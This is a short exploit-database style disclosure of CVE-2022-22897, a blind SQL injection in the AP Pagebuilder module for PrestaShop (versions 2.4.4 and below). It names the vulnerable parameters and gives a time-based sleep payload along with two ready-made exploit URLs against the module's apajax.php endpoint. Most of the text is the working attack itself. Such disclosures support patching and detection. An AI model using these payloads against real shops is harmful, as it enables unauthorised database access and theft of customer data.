PrestaShop Ap Pagebuilder module versions 2.4.4 and below suffer from a remote SQL injection vulnerability.
572afc861ea0ca4a81aaeb41616b518ea19cd0e87bb3b4b529c0171db4fdd9cb
# Exploit Title: AP PAGEBUILDER Prestashop module <= 2.4.4 'product_all_one_img' , 'image_product' Blind SQL Injection
# Date: 24-08-2022
# Exploit Author: Mohamed Ali Hammami
# Vendor Homepage: https://apollotheme.com/
#Software Link : https://apollotheme.com/products/ap-pagebuilder-prestashop-module
# Version: 2.4.4
# Tested on: Windows 10
#CVE: CVE-2022-22897
Parameters: product_all_one_img,image_product
Payload: 1) or sleep(4) #
Exploit:
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1)+or+sleep(4)%23&image_product=0&wishlist_compare=1
http://localhost/modules/appagebuilder/apajax.php?rand=1641313272327&leoajax=1&product_all_one_img=1&image_product=1)+or+sleep(4)%23&wishlist_compare=1